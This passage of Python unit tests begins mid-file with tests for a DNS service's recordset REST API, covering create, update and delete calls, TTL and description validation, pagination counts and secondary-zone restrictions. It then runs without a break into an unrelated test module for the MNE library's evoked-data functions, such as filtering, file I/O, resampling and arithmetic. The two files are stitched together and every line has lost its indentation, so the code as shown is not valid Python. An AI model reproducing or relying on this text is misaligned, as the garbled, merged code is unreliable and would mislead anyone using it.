side_effect=messaging.MessagingTimeout())
def test_get_recordsets_timeout(self, _):
url = '/zones/ba751950-6193-11e3-949a-0800200c9a66/recordsets'
self._assert_exception('timeout', 504, self.client.get, url)
def test_get_deleted_recordsets(self):
zone = self.create_domain(fixture=1)
self.create_recordset(zone)
url = '/zones/%s/recordsets' % zone['id']
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
# now delete the domain and get the recordsets
self.client.delete('/zones/%s' % zone['id'], status=202)
# Simulate the domain having been deleted on the backend
domain_serial = self.central_service.get_domain(
self.admin_context, zone['id']).serial
self.central_service.update_status(
self.admin_context, zone['id'], "SUCCESS", domain_serial)
# Check that we get a domain_not_found error
self._assert_exception('domain_not_found', 404, self.client.get, url)
def test_get_recordset(self):
# Create a recordset
recordset = self.create_recordset(self.domain)
url = '/zones/%s/recordsets/%s' % (self.domain['id'], recordset['id'])
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
self.assertEqual(recordset['name'], response.json['name'])
self.assertEqual(recordset['type'], response.json['type'])
# The action and status are NONE and ACTIVE as there are no records
self.assertEqual('NONE', response.json['action'])
self.assertEqual('ACTIVE', response.json['status'])
def test_get_recordset_invalid_id(self):
self._assert_invalid_uuid(self.client.get, '/zones/%s/recordsets/%s')
@patch.object(central_service.Service, 'get_recordset',
side_effect=messaging.MessagingTimeout())
def test_get_recordset_timeout(self, _):
url = '/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66' % (
self.domain['id'])
self._assert_exception('timeout', 504, self.client.get, url,
headers={'Accept': 'application/json'})
@patch.object(central_service.Service, 'get_recordset',
side_effect=exceptions.RecordSetNotFound())
def test_get_recordset_missing(self, _):
url = '/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66' % (
self.domain['id'])
self._assert_exception('recordset_not_found', 404,
self.client.get, url,
headers={'Accept': 'application/json'})
def test_update_recordset(self):
# Create a recordset
recordset = self.create_recordset(self.domain)
# Prepare an update body
body = {'description': 'Tester'}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.put_json(url, body, status=200)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIsNotNone(response.json['updated_at'])
self.assertEqual('Tester', response.json['description'])
# The action and status are NONE and ACTIVE as there are no records
self.assertEqual('NONE', response.json['action'])
self.assertEqual('ACTIVE', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_update_recordset_with_record_create(self):
# Create a recordset
recordset = self.create_recordset(self.domain, 'A')
# The action and status are NONE and ACTIVE as there are no records
self.assertEqual('NONE', recordset['action'])
self.assertEqual('ACTIVE', recordset['status'])
# Prepare an update body
body = {'description': 'Tester',
'type': 'A',
'records': ['192.0.2.1', '192.0.2.2']}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.put_json(url, body, status=202)
# Check the headers are what we expect
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the values returned are what we expect
self.assertIn('records', response.json)
self.assertEqual(2, len(response.json['records']))
self.assertEqual(set(['192.0.2.1', '192.0.2.2']),
set(response.json['records']))
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_update_recordset_with_record_replace(self):
# Create a recordset with one record
recordset = self.create_recordset(self.domain, 'A')
self.create_record(self.domain, recordset)
# Prepare an update body
body = {'description': 'Tester',
'records': ['192.0.2.201', '192.0.2.202']}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.put_json(url, body, status=202)
# Check the headers are what we expect
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the values returned are what we expect
self.assertIn('records', response.json)
self.assertEqual(2, len(response.json['records']))
self.assertEqual(set(['192.0.2.201', '192.0.2.202']),
set(response.json['records']))
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_update_recordset_with_record_clear(self):
# Create a recordset with one record
recordset = self.create_recordset(self.domain, 'A')
self.create_record(self.domain, recordset)
# Prepare an update body
body = {'description': 'Tester', 'records': []}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.put_json(url, body, status=200)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the values returned are what we expect
self.assertIn('records', response.json)
self.assertEqual(0, len(response.json['records']))
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_update_recordset_invalid_id(self):
self._assert_invalid_uuid(
self.client.put_json, '/zones/%s/recordsets/%s')
def test_update_recordset_validation(self):
        # NOTE: The schemas should be tested separately from the API, so we
        # don't need to test every variation via the API itself.
# Create a zone
recordset = self.create_recordset(self.domain)
# Prepare an update body with junk in the wrapper
body = {'description': 'Tester',
'records': ['192.3.3.17'],
'junk': 'Junk Field'}
# Ensure it fails with a 400
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400, self.client.put_json,
url, body)
# Prepare an update body with junk in the body
body = {'description': 'Tester', 'junk': 'Junk Field'}
# Ensure it fails with a 400
self._assert_exception('invalid_object', 400, self.client.put_json,
url, body)
@patch.object(central_service.Service, 'get_recordset',
side_effect=exceptions.DuplicateRecordSet())
def test_update_recordset_duplicate(self, _):
# Prepare an update body
body = {'description': 'Tester'}
# Ensure it fails with a 409
url = ('/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66'
% (self.domain['id']))
self._assert_exception('duplicate_recordset', 409,
self.client.put_json, url, body)
@patch.object(central_service.Service, 'get_recordset',
side_effect=messaging.MessagingTimeout())
def test_update_recordset_timeout(self, _):
# Prepare an update body
body = {'description': 'Tester'}
# Ensure it fails with a 504
url = ('/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66'
% (self.domain['id']))
self._assert_exception('timeout', 504, self.client.put_json, url,
body)
@patch.object(central_service.Service, 'get_recordset',
side_effect=exceptions.RecordSetNotFound())
def test_update_recordset_missing(self, _):
# Prepare an update body
body = {'description': 'Tester'}
# Ensure it fails with a 404
url = ('/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66'
% (self.domain['id']))
self._assert_exception('recordset_not_found', 404,
self.client.put_json, url, body)
def test_update_recordset_invalid_ttl(self):
recordset = self.create_recordset(self.domain)
body = {'ttl': '>?!@'}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_update_recordset_zero_ttl(self):
recordset = self.create_recordset(self.domain)
body = {'ttl': 0}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_update_recordset_negative_ttl(self):
recordset = self.create_recordset(self.domain)
body = {'ttl': -1}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_update_recordset_ttl_greater_than_max(self):
recordset = self.create_recordset(self.domain)
        body = {'ttl': 2147483648}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_update_recordset_description_too_long(self):
recordset = self.create_recordset(self.domain)
body = {'description': 'x' * 161}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_delete_recordset(self):
recordset = self.create_recordset(self.domain)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.delete(url, status=202)
self.assertEqual('application/json', response.content_type)
# Currently recordset does not have a status field. As there are no
# records, the recordset action/status show up as 'NONE', 'ACTIVE'
self.assertEqual('NONE', response.json['action'])
self.assertEqual('ACTIVE', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_delete_recordset_with_records(self):
# Create a recordset with one record
recordset = self.create_recordset(self.domain, 'A')
self.create_record(self.domain, recordset)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.delete(url, status=202)
self.assertEqual('application/json', response.content_type)
self.assertEqual('DELETE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
@patch.object(central_service.Service, 'delete_recordset',
side_effect=exceptions.RecordSetNotFound())
def test_delete_recordset_missing(self, _):
url = ('/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66'
% (self.domain['id']))
self._assert_exception('recordset_not_found', 404,
self.client.delete, url)
def test_delete_recordset_invalid_id(self):
self._assert_invalid_uuid(
self.client.delete, '/zones/%s/recordsets/%s')
def test_metadata_exists(self):
url = '/zones/%s/recordsets' % self.domain['id']
response = self.client.get(url)
# Make sure the fields exist
self.assertIn('metadata', response.json)
self.assertIn('total_count', response.json['metadata'])
def test_total_count(self):
url = '/zones/%s/recordsets' % self.domain['id']
response = self.client.get(url)
# The NS and SOA records are there by default
self.assertEqual(2, response.json['metadata']['total_count'])
# Create a recordset
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
response = self.client.get(url)
# Make sure total_count picked up the change
self.assertEqual(3, response.json['metadata']['total_count'])
def test_total_count_filtered_by_data(self):
# Closes bug 1447325
url = '/zones/%s/recordsets' % self.domain['id']
# Create a recordset
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
response = self.client.get(url)
# Make sure total_count picked up the change
self.assertEqual(3, response.json['metadata']['total_count'])
url = '/zones/%s/recordsets?data=nyan' % self.domain['id']
response = self.client.get(url)
self.assertEqual(0, response.json['metadata']['total_count'])
url = '/zones/%s/recordsets?data=ns1.example.org.' % self.domain['id']
response = self.client.get(url)
self.assertEqual(1, response.json['metadata']['total_count'])
# Test paging
new_domain = self.create_domain(name='example.net.')
recordset = self.create_recordset(new_domain, 'A')
self.create_record(new_domain, recordset, data='nyan')
recordset = self.create_recordset(new_domain, 'CNAME')
self.create_record(new_domain, recordset, data='nyan')
# Even with paging enabled, total_count is still the total number of
# recordsets matching the "data" filter
url = '/zones/%s/recordsets?limit=1&data=nyan' % new_domain.id
response = self.client.get(url)
self.assertEqual(2, response.json['metadata']['total_count'])
def test_total_count_pagination(self):
# Create two recordsets
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
fixture = self.get_recordset_fixture(self.domain['name'], fixture=1)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
        # Paginate to two recordsets per page; there should be four in total
url = '/zones/%s/recordsets?limit=2' % self.domain['id']
response = self.client.get(url)
# There are two recordsets returned
self.assertEqual(2, len(response.json['recordsets']))
# But there should be four in total (NS/SOA + the created)
self.assertEqual(4, response.json['metadata']['total_count'])
# Secondary Zones specific tests
def test_get_secondary_zone_recordset(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'root@example.com'
secondary = self.create_domain(**fixture)
# Create a recordset
recordset = self.create_recordset(secondary)
url = '/zones/%s/recordsets/%s' % (secondary['id'], recordset['id'])
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
self.assertEqual(recordset['name'], response.json['name'])
self.assertEqual(recordset['type'], response.json['type'])
def test_get_secondary_zone_recordsets(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'foo@bar.io'
secondary = self.create_domain(**fixture)
url = '/zones/%s/recordsets' % secondary['id']
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('recordsets', response.json)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
        # Secondary zones start with only the SOA recordset
        self.assertEqual(1, len(response.json['recordsets']))
soa = self.central_service.find_recordset(
self.admin_context, criterion={'domain_id': secondary['id'],
'type': 'SOA'})
data = [self.create_recordset(secondary,
name='x-%s.%s' % (i, secondary['name']))
for i in range(0, 10)]
data.insert(0, soa)
self._assert_paging(data, url, key='recordsets')
self._assert_invalid_paging(data, url, key='recordsets')
def test_create_secondary_zone_recordset(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'foo@bar.io'
secondary = self.create_domain(**fixture)
fixture = self.get_recordset_fixture(secondary['name'], fixture=0)
url = '/zones/%s/recordsets' % secondary['id']
self._assert_exception('forbidden', 403, self.client.post_json, url,
fixture)
def test_update_secondary_zone_recordset(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'foo@bar.io'
secondary = self.create_domain(**fixture)
# Set the context so that we can create a RRSet
recordset = self.create_recordset(secondary)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('forbidden', 403, self.client.put_json, url,
{'ttl': 100})
def test_delete_secondary_zone_recordset(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'foo@bar.io'
secondary = self.create_domain(**fixture)
# Set the context so that we can create a RRSet
recordset = self.create_recordset(secondary)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('forbidden', 403, self.client.delete, url)
def test_no_create_rs_deleting_zone(self):
# Prepare a create
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
body = fixture
self.client.delete('/zones/%s' % self.domain['id'], status=202)
self._assert_exception('bad_request', 400, self.client.post_json,
'/zones/%s/recordsets' % self.domain['id'],
body)
def test_no_update_rs_deleting_zone(self):
# Create a recordset
recordset = self.create_recordset(self.domain)
# Prepare an update body
body = {'description': 'Tester'}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self.client.delete('/zones/%s' % self.domain['id'], status=202)
self._assert_exception('bad_request', 400, self.client.put_json, url,
body)
def test_no_delete_rs_deleting_zone(self):
# Create a recordset
recordset = self.create_recordset(self.domain)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self.client.delete('/zones/%s' % self.domain['id'], status=202)
self._assert_exception('bad_request', 400, self.client.delete, url)
def test_invalid_recordset_filter(self):
invalid_url = '/zones/%s/recordsets?action=NONE' % self.domain['id']
self._assert_exception(
'bad_request', 400, self.client.get, invalid_url)
# Author: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Mads Jensen <mje.mads@gmail.com>
#
# License: BSD (3-clause)
import os.path as op
from copy import deepcopy
import warnings
import numpy as np
from scipy import fftpack
from numpy.testing import (assert_array_almost_equal, assert_equal,
assert_array_equal, assert_allclose)
from nose.tools import assert_true, assert_raises, assert_not_equal
from mne import (equalize_channels, pick_types, read_evokeds, write_evokeds,
grand_average, combine_evoked)
from mne.evoked import _get_peak, EvokedArray
from mne.epochs import EpochsArray
from mne.utils import (_TempDir, requires_pandas, slow_test,
requires_scipy_version)
from mne.io.meas_info import create_info
from mne.externals.six.moves import cPickle as pickle
warnings.simplefilter('always')
fname = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data',
'test-ave.fif')
fname_gz = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data',
'test-ave.fif.gz')
@requires_scipy_version('0.14')
def test_savgol_filter():
"""Test savgol filtering
"""
h_freq = 10.
evoked = read_evokeds(fname, 0)
freqs = fftpack.fftfreq(len(evoked.times), 1. / evoked.info['sfreq'])
data = np.abs(fftpack.fft(evoked.data))
match_mask = np.logical_and(freqs >= 0, freqs <= h_freq / 2.)
mismatch_mask = np.logical_and(freqs >= h_freq * 2, freqs < 50.)
assert_raises(ValueError, evoked.savgol_filter, evoked.info['sfreq'])
evoked.savgol_filter(h_freq)
data_filt = np.abs(fftpack.fft(evoked.data))
# decent in pass-band
assert_allclose(np.mean(data[:, match_mask], 0),
np.mean(data_filt[:, match_mask], 0),
rtol=1e-4, atol=1e-2)
# suppression in stop-band
assert_true(np.mean(data[:, mismatch_mask]) >
np.mean(data_filt[:, mismatch_mask]) * 5)
def test_hash_evoked():
"""Test evoked hashing
"""
ave = read_evokeds(fname, 0)
ave_2 = read_evokeds(fname, 0)
assert_equal(hash(ave), hash(ave_2))
# do NOT use assert_equal here, failing output is terrible
assert_true(pickle.dumps(ave) == pickle.dumps(ave_2))
ave_2.data[0, 0] -= 1
assert_not_equal(hash(ave), hash(ave_2))
@slow_test
def test_io_evoked():
"""Test IO for evoked data (fif + gz) with integer and str args
"""
tempdir = _TempDir()
ave = read_evokeds(fname, 0)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))[0]
    # This is not assert_array_equal due to Windows rounding
assert_true(np.allclose(ave.data, ave2.data, atol=1e-16, rtol=1e-3))
assert_array_almost_equal(ave.times, ave2.times)
assert_equal(ave.nave, ave2.nave)
assert_equal(ave._aspect_kind, ave2._aspect_kind)
assert_equal(ave.kind, ave2.kind)
assert_equal(ave.last, ave2.last)
assert_equal(ave.first, ave2.first)
assert_true(repr(ave))
# test compressed i/o
ave2 = read_evokeds(fname_gz, 0)
assert_true(np.allclose(ave.data, ave2.data, atol=1e-16, rtol=1e-8))
# test str access
condition = 'Left Auditory'
assert_raises(ValueError, read_evokeds, fname, condition, kind='stderr')
assert_raises(ValueError, read_evokeds, fname, condition,
kind='standard_error')
ave3 = read_evokeds(fname, condition)
assert_array_almost_equal(ave.data, ave3.data, 19)
# test read_evokeds and write_evokeds
types = ['Left Auditory', 'Right Auditory', 'Left visual', 'Right visual']
aves1 = read_evokeds(fname)
aves2 = read_evokeds(fname, [0, 1, 2, 3])
aves3 = read_evokeds(fname, types)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), aves1)
aves4 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))
for aves in [aves2, aves3, aves4]:
for [av1, av2] in zip(aves1, aves):
assert_array_almost_equal(av1.data, av2.data)
assert_array_almost_equal(av1.times, av2.times)
assert_equal(av1.nave, av2.nave)
assert_equal(av1.kind, av2.kind)
assert_equal(av1._aspect_kind, av2._aspect_kind)
assert_equal(av1.last, av2.last)
assert_equal(av1.first, av2.first)
assert_equal(av1.comment, av2.comment)
# test warnings on bad filenames
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
fname2 = op.join(tempdir, 'test-bad-name.fif')
write_evokeds(fname2, ave)
read_evokeds(fname2)
assert_true(len(w) == 2)
def test_shift_time_evoked():
""" Test for shifting of time scale
"""
tempdir = _TempDir()
# Shift backward
ave = read_evokeds(fname, 0)
ave.shift_time(-0.1, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
# Shift forward twice the amount
ave_bshift = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_bshift.shift_time(0.2, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave_bshift)
# Shift backward again
ave_fshift = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_fshift.shift_time(-0.1, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave_fshift)
ave_normal = read_evokeds(fname, 0)
ave_relative = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
assert_true(np.allclose(ave_normal.data, ave_relative.data,
atol=1e-16, rtol=1e-3))
assert_array_almost_equal(ave_normal.times, ave_relative.times, 10)
assert_equal(ave_normal.last, ave_relative.last)
assert_equal(ave_normal.first, ave_relative.first)
# Absolute time shift
ave = read_evokeds(fname, 0)
ave.shift_time(-0.3, relative=False)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave_absolute = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
assert_true(np.allclose(ave_normal.data, ave_absolute.data,
atol=1e-16, rtol=1e-3))
assert_equal(ave_absolute.first, int(-0.3 * ave.info['sfreq']))
def test_evoked_resample():
"""Test for resampling of evoked data
"""
tempdir = _TempDir()
# upsample, write it out, read it in
ave = read_evokeds(fname, 0)
sfreq_normal = ave.info['sfreq']
ave.resample(2 * sfreq_normal)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave_up = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
# compare it to the original
ave_normal = read_evokeds(fname, 0)
# and compare the original to the downsampled upsampled version
ave_new = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_new.resample(sfreq_normal)
assert_array_almost_equal(ave_normal.data, ave_new.data, 2)
assert_array_almost_equal(ave_normal.times, ave_new.times)
assert_equal(ave_normal.nave, ave_new.nave)
assert_equal(ave_normal._aspect_kind, ave_new._aspect_kind)
assert_equal(ave_normal.kind, ave_new.kind)
assert_equal(ave_normal.last, ave_new.last)
assert_equal(ave_normal.first, ave_new.first)
# for the above to work, the upsampling just about had to, but
# we'll add a couple extra checks anyway
assert_true(len(ave_up.times) == 2 * len(ave_normal.times))
assert_true(ave_up.data.shape[1] == 2 * ave_normal.data.shape[1])
def test_evoked_detrend():
"""Test for detrending evoked data
"""
ave = read_evokeds(fname, 0)
ave_normal = read_evokeds(fname, 0)
ave.detrend(0)
ave_normal.data -= np.mean(ave_normal.data, axis=1)[:, np.newaxis]
picks = pick_types(ave.info, meg=True, eeg=True, exclude='bads')
assert_true(np.allclose(ave.data[picks], ave_normal.data[picks],
rtol=1e-8, atol=1e-16))
@requires_pandas
def test_to_data_frame():
"""Test evoked Pandas exporter"""
ave = read_evokeds(fname, 0)
assert_raises(ValueError, ave.to_data_frame, picks=np.arange(400))
df = ave.to_data_frame()
assert_true((df.columns == ave.ch_names).all())
df = ave.to_data_frame(index=None).reset_index('time')
assert_true('time' in df.columns)
assert_array_equal(df.values[:, 1], ave.data[0] * 1e13)
assert_array_equal(df.values[:, 3], ave.data[2] * 1e15)
def test_evoked_proj():
"""Test SSP proj operations
"""
for proj in [True, False]:
ave = read_evokeds(fname, condition=0, proj=proj)
assert_true(all(p['active'] == proj for p in ave.info['projs']))
# test adding / deleting proj
if proj:
assert_raises(ValueError, ave.add_proj, [],
{'remove_existing': True})
assert_raises(ValueError, ave.del_proj, 0)
else:
projs = deepcopy(ave.info['projs'])
n_proj = len(ave.info['projs'])
ave.del_proj(0)
assert_true(len(ave.info['projs']) == n_proj - 1)
ave.add_proj(projs, remove_existing=False)
assert_true(len(ave.info['projs']) == 2 * n_proj - 1)
ave.add_proj(projs, remove_existing=True)
assert_true(len(ave.info['projs']) == n_proj)
ave = read_evokeds(fname, condition=0, proj=False)
data = ave.data.copy()
ave.apply_proj()
assert_allclose(np.dot(ave._projector, data), ave.data)
def test_get_peak():
"""Test peak getter
"""
evoked = read_evokeds(fname, condition=0, proj=True)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmin=1)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmax=0.9)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmin=0.02,
tmax=0.01)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', mode='foo')
assert_raises(RuntimeError, evoked.get_peak, ch_type=None, mode='foo')
assert_raises(ValueError, evoked.get_peak, ch_type='misc', mode='foo')
ch_idx, time_idx = evoked.get_peak(ch_type='mag')
assert_true(ch_idx in evoked.ch_names)
assert_true(time_idx in evoked.times)
ch_idx, time_idx = evoked.get_peak(ch_type='mag',
time_as_index=True)
assert_true(time_idx < len(evoked.times))
data = np.array([[0., 1., 2.],
[0., -3., 0]])
times = np.array([.1, .2, .3])
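    # mode='abs' picks the largest |value| (here -3, i.e. channel 1 at time
    # index 1); 'pos'/'neg' restrict the search to one sign only.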
ch_idx, time_idx = _get_peak(data, times, mode='abs')
assert_equal(ch_idx, 1)
assert_equal(time_idx, 1)
ch_idx, time_idx = _get_peak(data * -1, times, mode='neg')
assert_equal(ch_idx, 0)
assert_equal(time_idx, 2)
ch_idx, time_idx = _get_peak(data, times, mode='pos')
assert_equal(ch_idx, 0)
assert_equal(time_idx, 2)
assert_raises(ValueError, _get_peak, data + 1e3, times, mode='neg')
assert_raises(ValueError, _get_peak, data - 1e3, times, mode='pos')
def test_drop_channels_mixin():
"""Test channels-dropping functionality
"""
evoked = read_evokeds(fname, condition=0, proj=True)
drop_ch = evoked.ch_names[:3]
ch_names = evoked.ch_names[3:]
ch_names_orig = evoked.ch_names
dummy = evoked.drop_channels(drop_ch, copy=True)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, evoked.ch_names)
assert_equal(len(ch_names_orig), len(evoked.data))
evoked.drop_channels(drop_ch)
assert_equal(ch_names, evoked.ch_names)
assert_equal(len(ch_names), len(evoked.data))
def test_pick_channels_mixin():
"""Test channel-picking functionality
"""
evoked = read_evokeds(fname, condition=0, proj=True)
ch_names = evoked.ch_names[:3]
ch_names_orig = evoked.ch_names
dummy = evoked.pick_channels(ch_names, copy=True)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, evoked.ch_names)
assert_equal(len(ch_names_orig), len(evoked.data))
evoked.pick_channels(ch_names)
assert_equal(ch_names, evoked.ch_names)
assert_equal(len(ch_names), len(evoked.data))
evoked = read_evokeds(fname, condition=0, proj=True)
assert_true('meg' in evoked)
assert_true('eeg' in evoked)
evoked.pick_types(meg=False, eeg=True)
assert_true('meg' not in evoked)
assert_true('eeg' in evoked)
assert_true(len(evoked.ch_names) == 60)
def test_equalize_channels():
"""Test equalization of channels
"""
evoked1 = read_evokeds(fname, condition=0, proj=True)
evoked2 = evoked1.copy()
ch_names = evoked1.ch_names[2:]
evoked1.drop_channels(evoked1.ch_names[:1])
evoked2.drop_channels(evoked2.ch_names[1:2])
my_comparison = [evoked1, evoked2]
equalize_channels(my_comparison)
for e in my_comparison:
assert_equal(ch_names, e.ch_names)
def test_evoked_arithmetic():
"""Test evoked arithmetic
"""
ev = read_evokeds(fname, condition=0)
ev1 = EvokedArray(np.ones_like(ev.data), ev.info, ev.times[0], nave=20)
ev2 = EvokedArray(-np.ones_like(ev.data), ev.info, ev.times[0], nave=10)
# combine_evoked([ev1, ev2]) should be the same as ev1 + ev2:
# data should be added according to their `nave` weights
# nave = ev1.nave + ev2.nave
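    # Worked example: ev1.data == 1 with nave=20 and ev2.data == -1 with
    # nave=10, so the nave-weighted sum is (20*1 + 10*(-1)) / 30 == 1/3.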
ev = ev1 + ev2
assert_equal(ev.nave, ev1.nave + ev2.nave)
assert_allclose(ev.data, 1. / 3. * np.ones_like(ev.data))
ev = ev1 - ev2
assert_equal(ev.nave, ev1.nave + ev2.nave)
assert_equal(ev.comment, ev1.comment + ' - ' + ev2.comment)
assert_allclose(ev.data, np.ones_like(ev1.data))
# default comment behavior if evoked.comment is None
old_comment1 = ev1.comment
old_comment2 = ev2.comment
ev1.comment = None
with warnings.catch_warnings(record=True):
warnings.simplefilter('always')
ev = ev1 - ev2
assert_equal(ev.comment, 'unknown')
ev1.comment = old_comment1
ev2.comment = old_comment2
# equal weighting
ev = combine_evoked([ev1, ev2], weights='equal')
assert_allclose(ev.data, np.zeros_like(ev1.data))
# combine_evoked([ev1, ev2], weights=[1, 0]) should yield the same as ev1
ev = combine_evoked([ev1, ev2], weights=[1, 0])
assert_equal(ev.nave, ev1.nave)
assert_allclose(ev.data, ev1.data)
# simple subtraction (like in oddball)
ev = combine_evoked([ev1, ev2], weights=[1, -1])
assert_allclose(ev.data, 2 * np.ones_like(ev1.data))
